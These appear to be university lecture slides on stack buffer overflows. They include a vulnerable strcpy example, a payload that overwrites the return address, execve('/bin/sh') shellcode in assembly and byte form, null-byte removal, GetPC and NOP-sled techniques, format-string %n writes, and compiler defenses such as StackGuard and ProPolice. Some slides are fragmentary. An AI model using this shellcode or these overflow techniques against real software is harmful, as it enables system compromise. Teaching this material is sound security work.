Buffer
1. Stack-based
– covered in this class
2. Heap-based
– more advanced
– very dependent on system and library version
Basic Example
#include <string.h>
int main(int argc, char **argv) {
    char buf[64];
    strcpy(buf, argv[1]);
}
Dump of assembler code for function main:
0x080483e4 <+0>: push %ebp
0x080483e5 <+1>: mov %esp,%ebp
0x080483e7 <+3>: sub $72,%esp
0x080483ea <+6>: mov 12(%ebp),%eax
0x080483ed <+9>: mov 4(%eax),%eax
0x080483f0 <+12>: mov %eax,4(%esp)
0x080483f4 <+16>: lea -64(%ebp),%eax
0x080483f7 <+19>: mov %eax,(%esp)
0x080483fa <+22>: call 0x8048300 <strcpy@plt>
0x080483ff <+27>: leave
0x08048400 <+28>: ret
Stack (high addresses first):
…
argv
argc
return addr
caller’s ebp    <- %ebp
buf (64 bytes)
…
argv[1]         (second argument to strcpy)
buf             (first argument to strcpy)    <- %esp
Input: “123456”
Same program and disassembly as in the basic example. Stack after strcpy returns (high addresses first):
…
argv
argc
return addr
caller’s ebp    <- %ebp
buf (64 bytes)  123456\0 at the start of buf
…
argv[1]
buf             <- %esp
Input: “A”x68 . “\xEF\xBE\xAD\xDE”
Same program as in the basic example. The 68 “A” bytes fill buf (64 bytes) and the saved ebp (4 bytes), the next four bytes replace the return address with 0xDEADBEEF (stored little-endian), and the terminating \0 corrupts the low byte of argc. Stack after strcpy returns (high addresses first):
…
argv
argc            corrupted
return addr     overwritten with 0xDEADBEEF
caller’s ebp    overwritten with AAAA    <- %ebp
buf (64 bytes)  attacker-controlled (“A”s, or shellcode…)
…
argv[1]
buf             <- %esp
When main executes leave and ret, control transfers to the overwritten return address.
Executing system calls
execve("/bin/sh", 0, 0);
1. Put syscall number in eax (execve is 0xb)
2. Set up arg 1 in ebx, arg 2 in ecx, arg 3 in edx (here: addr. of "/bin/sh" in ebx, 0 in ecx and edx)
3. Call int 0x80
4. System call runs. Result in eax
Shellcode
Author: kernel_panik, [Link]
Program Example
#include <stdio.h>
#include <string.h>
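Execution
xor ecx, ecx         ; ecx = 0
mul ecx              ; eax = edx = 0
push ecx             ; zero bytes that terminate the string
push 0x68732f2f      ; "//sh"
push 0x6e69622f      ; "/bin"
mov ebx, esp         ; ebx = address of "/bin//sh"
mov al, 0xb          ; eax = 0x0b (execve)
int 0x80
Registers: ebx = esp, ecx = 0, eax = 0x0b
Stack (high addresses first):
0x0
0x68 h
0x73 s
0x2f /
0x2f /
0x6e n
0x69 i
0x62 b
0x2f /    <- esp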
Tips
Factors affecting the stack frame:
• statically declared buffers may be padded
• what about space for callee-save regs?
• [advanced] what if some vars are in regs only?
• [advanced] what if compiler reorders local variables on stack?
Protip: Inserting nops (e.g., 0x90) into shellcode allows for slack
Stack (high addresses first):
…
argv
argc
return addr
caller’s ebp    <- %ebp
buf             nop slide: 0x90 0x90 ...
…
argv[1]
buf
Recap
To generate exploit for a basic buffer overflow:
computation + control
Stack Buffers
What If Buffer is Overstuffed?
• Memory pointed to by str is copied onto stack…
void func(char *str) {
    char buf[126];
    strcpy(buf,str);
}
strcpy does NOT check whether the string at *str contains fewer than 126 characters
• If the string, including its terminating ‘\0’, is longer than 126 bytes, it will overwrite adjacent stack locations. The overwritten value will be interpreted as return address!
Executing Attack Code
• Suppose buffer contains attacker-created string
– For example, *str contains a string received from the
network as input to some network service daemon
Attack #1: Return Address
① Change the return address to point to the attack code. After the function returns, control is transferred to the attack code
② … or return-to-libc: use existing instructions in the code segment such as system(), exec(), etc. as the attack code
Stack diagram (high addresses first):
Attack code, “/bin/sh”
args (funcp)
return address    ① points to the attack code, or ② to system(): set stack pointers to return to a dangerous library function
PFP
pointer var (ptr)
buffer (buf)
Buffer Overflow Issues
• Executable attack code is stored on stack, inside
the buffer containing attacker’s string
– Stack memory is supposed to contain only data, but…
• For the basic attack, overflow portion of the buffer
must contain correct address of attack code in the
RET position
– The value in the RET position must point to the
beginning of attack assembly code in the buffer
• Otherwise application will crash with segmentation violation
– Attacker must correctly guess in which stack position
his buffer will be when the function is called
Problem: No Range Checking
• strcpy does not check input size
– strcpy(buf, str) simply copies memory contents into
buf starting from *str until “\0” is encountered,
ignoring the size of area allocated to buf
• Many C library functions are unsafe
– strcpy(char *dest, const char *src)
– strcat(char *dest, const char *src)
– gets(char *s)
– scanf(const char *format, …)
– printf(const char *format, …)
Does Range Checking Help?
• strncpy(char *dest, const char *src, size_t n)
– If strncpy is used instead of strcpy, no more than n
characters will be copied from *src to *dest
• Programmer has to supply the right value of n
• Potential overflow in htpasswd.c (Apache 1.3):
… strcpy(record,user);
strcat(record,":");
strcat(record,cpw); …
Copies username (“user”) into buffer (“record”), then appends “:” and hashed password (“cpw”)
Attack #2: Pointer Variables
return address
PFP
Two’s Complement
Binary representation of negative integers
Represent X (where X<0) as 2^N-|X|
N is word size (e.g., 32 bits on x86 architecture)
1        0 0 0 0 … 0 1
2^31-1   0 1 1 1 … 1 1
-1       1 1 1 1 … 1 1
-2       1 1 1 1 … 1 0
-2^31    1 0 0 0 … 0 0
2^31     ??
Integer Overflow
Heap Overflow
Implementation of Variable Args
• Special functions va_start, va_arg, va_end
compute arguments at run-time (how?)
Activation Record for Variable Args
Format Strings in C
• Proper use of printf format string:
… int foo=1234;
printf("foo = %d in decimal, %X in hex",foo,foo); …
• This will print
foo = 1234 in decimal, 4D2 in hex
C has a concise way of printing multiple symbols: %Mx prints its argument (taken from the stack) padded to at least M characters. If attackString contains enough “%Mx” so that the number of characters printed so far equals the least significant byte of the address of the attack code (x86 is little-endian), “%n” will write this byte into &RET.
Repeat three times (four “%n” in total) to write into &RET+1, &RET+2, &RET+3, replacing RET with the address of attack code.
detect_attack() prevents
checksum attack on SSH1…
Background: Layout of the Virtual Space of a Process
[Figure: the layout of the virtual space of a process in Linux]
Cont.
• Code and data consist of instructions and of initialized and uninitialized global and static data, respectively;
• Runtime heap is used for dynamically allocated memory (malloc());
• The stack is used whenever a function call is made.
Layout Of Stack
• Inject malicious code into the virtual space of a process;
• Modify the content of RET to redirect the execution flow to the malicious code.
Stack diagram (low address first): Local variable (buffer), RET, Attack Code. The string grows toward higher addresses; the stack grows toward lower addresses.
The goal is to exploit a buffer overflow so that the execution flow can be re-
directed to 0x00401034.
Cont.
• Find that 0x00401034 is the byte sequence 00 40 10 34, i.e. “@”, ^P and “4” in ASCII, preceded by ‘\0’ (00)
int main()
{
    sh();
    printf("main end :)\n");
    return 0;
}
Cont.
(gdb) disas sh
Dump of assembler code for function sh:
0x08048208 <sh+0>: push %ebp
0x08048209 <sh+1>: mov %esp,%ebp
0x0804820b <sh+3>: sub $0x10,%esp
0x0804820e <sh+6>: lea -0x4(%ebp),%eax
0x08048211 <sh+9>: add $0x8,%eax
0x08048214 <sh+12>: mov %eax,-0x4(%ebp)
0x08048217 <sh+15>: mov -0x4(%ebp),%edx
0x0804821a <sh+18>: mov $0x80bd6a0,%eax
0x0804821f <sh+23>: mov %eax,(%edx)
0x08048221 <sh+25>: leave
0x08048222 <sh+26>: ret
Stack of sh (low addresses first): return (the local pointer variable), Previous ebp, RET
Three issues for injecting code
• How to find a location in the stack to inject malicious code?
• How to generate a shellcode (Attack Code)?
• How to redirect the execution flow to the shellcode?
– If using stack buffer overflow, the content of memory unit
storing return address should be modified.
– The injected payload should be long enough to do
overwriting.
How to find a location to inject code
• If using stack buffer overflow, we might need to locate the stack frame of a function.
• Then we need to determine the offset from the bottom or the top of the stack at which to inject the shellcode.
• We can use the following code to locate a stack (find_start() and find_end() are not shown on this slide):
#include <stdio.h>
int main()
{
    printf("0x%x\n",find_start());
    printf("0x%x\n",find_end());
    return 0;
}
Shell code
• Shellcode is a set of instructions that is injected into and then executed by an exploited program;
• Shellcode is used to directly manipulate registers and the function of a program;
• Most shellcode uses system calls to carry out its malicious behavior;
• System calls are a set of functions that give access to operating-system-specific services such as getting input, producing output, or exiting a process;
How to execute a system call in Linux?
Example:
#include <stdlib.h>
int main()
{
    exit(0);
}
Cont.
gcc -g -static -o exit exit.c
gdb exit
Arlington:/home/src/shellcodes/code/ch03# gdb exit
GNU gdb 6.7.1-debian
Copyright (C) 2007 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <[Link]
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/i686/cmov/libthread_db.so.1".
(gdb) disas _exit
Dump of assembler code for function _exit:
0x0804df4c <_exit+0>: mov 0x4(%esp),%ebx
0x0804df50 <_exit+4>: mov $0xfc,%eax
0x0804df55 <_exit+9>: int $0x80
0x0804df57 <_exit+11>: mov $0x1,%eax
0x0804df5c <_exit+16>: int $0x80
0x0804df5e <_exit+18>: hlt
End of assembler dump.
Write a shell code for exit()
• The shell code should do the following:
– Store the value of 0 into EBX;
– Store the value of 1 into EAX;
– Execute int 0x80 instruction
Cont.
section .text
global _start
_start:
    mov ebx, 0
    mov eax, 1
    int 0x80
Cont.
Arlington:/home/src/shellcodes/# nasm -f elf [Link]
Arlington:/home/src/shellcodes/# ld -o exit_1 exit.o
Arlington:/home/src/shellcodes/# objdump -d exit_1
08048060 <_start>:
8048060: bb 00 00 00 00 mov $0x0,%ebx
8048065: b8 01 00 00 00 mov $0x1,%eax
804806a: cd 80 int $0x80
The opcode bytes in the second column (shown in red on the original slide) can be used as the shell code.
Cont.
char shellcode[] = "\xbb\x00\x00\x00\x00"
                   "\xb8\x01\x00\x00\x00"
                   "\xcd\x80";
int main()
{
    int *ret;
    ret = (int *)&ret + 2;        /* two words above the local: main's saved return address */
    (*ret) = (int)shellcode;      /* replace it with the address of shellcode */
}
Injectable Shellcode
• Null (\x00) will cause shellcode to fail when injected into a
character array because \x00 is used to terminate strings;
• Injectable shellcode can't contain \x00;
• shellcode[] = "\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80" is not an
injectable shellcode;
• How to remove \x00?
• Use “xor ebx, ebx” to replace “mov ebx, 0”
• Use “mov al, 1 ” to replace “mov eax, 1”
Cont.
Before:
bb 00 00 00 00 mov $0x0,%ebx
b8 01 00 00 00 mov $0x1,%eax
cd 80 int $0x80
After:
31 db xor %ebx,%ebx
b0 01 mov $0x1,%al
cd 80 int $0x80
shellcode[] = "\x31\xdb\xb0\x01\xcd\x80"
A framework for injectable shellcode
shellcode:
    pop esi              ; esi will contain the address of '/bin/sh'
    <shellcode meat>
GotoCall:
    call shellcode       ; GetPC code
    db '/bin/sh'
GetPC Code
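• Call
• fsave/fstenv
• Can be used to get the address of the last FPU instruction
– fldz
– fnstenv [esp-12]
– pop ecx
– add cl, 10
– nop
– ECX will hold the address of the nop, i.e. the current EIP (the address of fldz plus the 10 bytes occupied by fldz, fnstenv, pop and add).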
An Example
section .text
global _start
_start:
    jmp short GotoCall
shellcode:
    pop esi                    ; esi = address of the string below
    xor eax, eax
    mov byte [esi + 7], al     ; replace J with \0 to terminate '/bin/sh'
    lea ebx, [esi]
    mov dword [esi + 8], ebx   ; replace AAAA with the address of '/bin/sh'
    mov dword [esi + 12], eax  ; replace KKKK with NULL
    mov al, 0x0b               ; execve
    mov ebx, esi
    lea ecx, [esi + 8]
    lea edx, [esi + 12]
    int 0x80
GotoCall:
    call shellcode             ; GetPC code
    db '/bin/shJAAAAKKKK'      ; AAAA and KKKK can be parameters for system calls
NOP Sled
• Determining the correct offset for injecting code is not easy;
• A NOP (no operation) sled can be used to increase the number of potential offsets;
• Generally, we can fill in the beginning of shellcode with NOPs.
• The opcode for NOP is 0x90
• EX: shellcode[] = "\x90\x90\x90\x31\xdb\xb0\x01\xcd\x80"
• Some FPU, SSE, MMX instructions can also be used as sled.
Summary of Launching An Attack
• Find a buffer overflow that can be used to
redirect the control flow of the victim program
– Stack Buffer Overflow
– Heap Buffer Overflow
• Inject a segment of malicious shellcode
How to prevent stack buffer overflow?
• Stack Guard
– In a stack frame, a canary word is placed next to the return address (between it and the local variables) whenever a function is called;
– The canary will be checked before the function returns. If the value of the canary has changed, this indicates malicious behavior.
Stack frame (6. Unix Stack Frame), lower addresses first:
Variables
Old Base Pointer
Canary Value
Return Address
Arguments    (Higher address)
Cont.
• Canary can still be intact if the attacker overwrites it with the correct value
– Solution – use “random canary” value
– Use “terminator canary” – consists of all string terminator sequences – NULL, ‘\r’, ‘\n’, -1…
• Attacker can still point to the ‘return address’ and change it directly, without touching the canary
– This is a shortcoming of StackGuard
– Can be dealt with by XORing the canary value and ‘return address’ to detect if ‘return address’ has changed
Stack Shield
• Stack Shield
– Copy RET address into an unoverflowable memory region;
– The two copies of the RET address are compared before a function returns;
– If the values are different, a malicious exploitation has occurred;
– Needs another stack-like data structure to maintain RET addresses.
ProPolice
• Perhaps most sophisticated compiler protection
• Rearrange local variables such that char buffers are always allocated above the other local variables and pointers, next to a Guard Value, so an overflowing buffer hits the guard before anything else
• Does not work fine with small buffers – somewhat unstable
Stack frame (7. Unix Stack Frame), lower addresses first:
Local Variables and Pointers    (Lower address)
Local char buffers
Guard Value
Old Base Pointer
Return Address
Arguments    (Higher address)